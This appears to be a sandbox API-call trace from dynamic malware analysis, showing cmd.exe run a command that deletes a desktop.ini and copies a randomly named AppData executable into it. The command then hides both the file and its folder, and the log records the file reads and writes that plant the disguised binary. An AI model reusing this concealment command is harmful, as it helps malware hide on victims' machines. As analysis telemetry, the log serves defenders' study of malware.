lpType=0x2ae81c, lpData=0x2ae820, lpcbData=0x2ae818*=0x1000 | out: lpType=0x2ae81c*=0x4, lpData=0x2ae820*=0x9, lpcbData=0x2ae818*=0x4) returned 0x0 [0149.607] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae81c, lpData=0x2ae820, lpcbData=0x2ae818*=0x1000 | out: lpType=0x2ae81c*=0x4, lpData=0x2ae820*=0x9, lpcbData=0x2ae818*=0x4) returned 0x0 [0149.607] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae81c, lpData=0x2ae820, lpcbData=0x2ae818*=0x1000 | out: lpType=0x2ae81c*=0x0, lpData=0x2ae820*=0x9, lpcbData=0x2ae818*=0x1000) returned 0x2 [0149.607] RegCloseKey (hKey=0x40) returned 0x0 [0149.607] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886378 [0149.607] srand (_Seed=0x5b886378) [0149.607] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\"" [0149.607] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\"" [0149.608] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0149.608] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x331cf8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0149.608] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0149.608] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0149.608] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0149.608] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0149.608] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0149.608] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0149.608] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0149.608] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0149.608] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0149.608] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0149.608] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0149.608] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0149.609] GetEnvironmentStringsW () returned 0x3326e8* [0149.609] FreeEnvironmentStringsW (penv=0x3326e8) returned 1 [0149.609] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0149.609] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0149.609] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0149.609] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0149.609] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0149.609] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0149.609] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0149.609] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0149.609] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0149.609] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0149.609] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af5e0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0149.609] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af5e0, lpFilePart=0x2af5dc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af5dc*="Desktop") returned 0x18 [0149.609] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0149.609] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af35c | out: lpFindFileData=0x2af35c) returned 0x330d78 [0149.609] FindClose (in: hFindFile=0x330d78 | out: hFindFile=0x330d78) returned 1 [0149.610] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af35c | out: lpFindFileData=0x2af35c) returned 0x330d78 [0149.610] FindClose (in: hFindFile=0x330d78 | out: hFindFile=0x330d78) returned 1 [0149.610] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af35c | out: lpFindFileData=0x2af35c) returned 0x330d78 [0149.610] FindClose (in: hFindFile=0x330d78 | out: hFindFile=0x330d78) returned 1 [0149.610] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0149.610] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0149.610] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0149.610] GetEnvironmentStringsW () returned 0x330598* [0149.610] FreeEnvironmentStringsW (penv=0x330598) returned 1 [0149.610] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0149.611] GetConsoleOutputCP () returned 0x1b5 [0149.645] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0149.645] GetUserDefaultLCID () returned 0x409 [0149.645] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0149.645] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af720, cchData=128 | out: lpLCData="0") returned 2 [0149.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af720, cchData=128 | out: lpLCData="0") returned 2 [0149.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af720, cchData=128 | out: lpLCData="1") returned 2 [0149.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0149.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0149.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0149.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0149.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0149.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0149.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0149.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0149.646] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0149.646] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0149.646] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0149.647] GetConsoleTitleW (in: lpConsoleTitle=0x320b70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0149.647] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0149.647] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0149.647] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0149.647] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0149.648] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0149.648] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0149.649] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0149.649] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0149.649] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0149.649] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0149.649] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0149.651] _wcsicmp (_String1="del", _String2=")") returned 59 [0149.651] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0149.652] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0149.652] _wcsicmp (_String1="IF", _String2="del") returned 5 [0149.652] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0149.652] _wcsicmp (_String1="REM", _String2="del") returned 14 [0149.652] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0149.654] _wcsicmp (_String1="type", _String2=")") returned 75 [0149.654] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0149.654] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0149.654] _wcsicmp (_String1="IF", _String2="type") returned -11 [0149.654] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0149.654] _wcsicmp (_String1="REM", _String2="type") returned -2 [0149.655] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0149.658] SetErrorMode (uMode=0x0) returned 0x0 [0149.658] SetErrorMode (uMode=0x1) returned 0x0 [0149.658] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x330658, lpFilePart=0x2aeed4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2aeed4*="Desktop") returned 0x18 [0149.658] SetErrorMode (uMode=0x0) returned 0x1 [0149.659] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0149.659] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0149.663] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0149.664] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aec50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aec50) returned 0xffffffff [0149.664] GetLastError () returned 0x2 [0149.664] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2aec50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aec50) returned 0xffffffff [0149.664] GetLastError () returned 0x2 [0149.664] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aec50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aec50) returned 0x330940 [0149.664] FindClose (in: hFindFile=0x330940 | out: hFindFile=0x330940) returned 1 [0149.664] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2aec50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aec50) returned 0xffffffff [0149.664] GetLastError () returned 0x2 [0149.664] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aec50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aec50) returned 0x330940 [0149.665] FindClose (in: hFindFile=0x330940 | out: hFindFile=0x330940) returned 1 [0149.665] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0149.665] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0149.665] GetConsoleTitleW (in: lpConsoleTitle=0x2af148, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0149.665] InitializeProcThreadAttributeList (in: lpAttributeList=0x2aefd0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af098 | out: lpAttributeList=0x2aefd0, lpSize=0x2af098) returned 1 [0149.665] UpdateProcThreadAttribute (in: lpAttributeList=0x2aefd0, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af090, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2aefd0, lpPreviousValue=0x0) returned 1 [0149.665] GetStartupInfoW (in: lpStartupInfo=0x2aef8c | out: lpStartupInfo=0x2aef8c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0149.665] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0149.666] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af02c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af078 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" ", lpProcessInformation=0x2af078*(hProcess=0x50, hThread=0x4c, dwProcessId=0xbc4, dwThreadId=0xc88)) returned 1 [0149.669] CloseHandle (hObject=0x4c) returned 1 [0149.669] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0149.669] GetEnvironmentStringsW () returned 0x330bd0* [0149.669] FreeEnvironmentStringsW (penv=0x330bd0) returned 1 [0149.669] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0149.810] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2aef6c | out: lpExitCode=0x2aef6c*=0x0) returned 1 [0149.810] CloseHandle (hObject=0x50) returned 1 [0149.810] _vsnwprintf (in: _Buffer=0x2af0b4, _BufferCount=0x13, _Format="%08X", _ArgList=0x2aef78 | out: _Buffer="00000000") returned 8 [0149.810] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0149.810] GetEnvironmentStringsW () returned 0x3326d8* [0149.810] FreeEnvironmentStringsW (penv=0x3326d8) returned 1 [0149.810] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0149.810] GetEnvironmentStringsW () returned 0x3326d8* [0149.811] FreeEnvironmentStringsW (penv=0x3326d8) returned 1 [0149.811] DeleteProcThreadAttributeList (in: lpAttributeList=0x2aefd0 | out: lpAttributeList=0x2aefd0) [0149.811] GetConsoleTitleW (in: lpConsoleTitle=0x2af350, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0149.811] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2ae3c8, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x2ae3cc, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2ae3c8*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0149.811] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0149.812] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0149.812] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0149.812] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\device~1\\device\\{8702d~1\\desktop.ini")) returned 0xffffffff [0149.812] GetLastError () returned 0x2 [0149.812] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1" (normalized: "c:\\users\\alluse~1\\micros~1\\device~1\\device\\{8702d~1")) returned 0x10 [0149.812] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0149.812] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0149.812] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\device~1\\device\\{8702d~1\\desktop.ini")) returned 0xffffffff [0149.812] GetLastError () returned 0x2 [0149.812] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x333854, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x333854) returned 0xffffffff [0149.812] GetLastError () returned 0x2 [0149.812] _get_osfhandle (_FileHandle=2) returned 0xb [0149.812] GetFileType (hFile=0xb) returned 0x2 [0149.813] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0149.813] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2aedc8 | out: lpMode=0x2aedc8) returned 1 [0149.813] _get_osfhandle (_FileHandle=2) returned 0xb [0149.813] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2aedfc | out: lpConsoleScreenBufferInfo=0x2aedfc) returned 1 [0149.813] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0149.814] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.814] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.814] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.814] GetFileType (hFile=0x7) returned 0x2 [0149.814] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0149.814] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2af4ec | out: lpMode=0x2af4ec) returned 1 [0149.814] _dup (_FileHandle=1) returned 3 [0149.815] _close (_FileHandle=1) returned 0 [0149.815] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini", _String2="con") returned -53 [0149.815] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\device~1\\device\\{8702d~1\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2af4bc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0149.815] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0149.815] GetConsoleTitleW (in: lpConsoleTitle=0x2af2ec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0149.816] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x2aee50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee50) returned 0x32e768 [0149.822] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0149.822] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0149.822] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0149.823] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2add5c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0149.823] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0149.823] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.823] GetFileType (hFile=0x58) returned 0x1 [0149.823] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.823] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x2addb4 | out: lpFileSizeHigh=0x2addb4*=0x0) returned 0x7d600 [0149.823] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.823] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.823] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.823] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.824] GetFileType (hFile=0x50) returned 0x1 [0149.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.824] GetFileType (hFile=0x50) returned 0x1 [0149.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.824] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.826] GetFileType (hFile=0x50) returned 0x1 [0149.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.826] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.826] GetFileType (hFile=0x50) returned 0x1 [0149.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.826] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.826] GetFileType (hFile=0x50) returned 0x1 [0149.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.826] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.826] GetFileType (hFile=0x50) returned 0x1 [0149.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.826] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.826] GetFileType (hFile=0x50) returned 0x1 [0149.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.826] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.827] GetFileType (hFile=0x50) returned 0x1 [0149.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.827] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.827] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.827] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.827] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.827] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.827] GetFileType (hFile=0x50) returned 0x1 [0149.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.827] GetFileType (hFile=0x50) returned 0x1 [0149.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.827] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 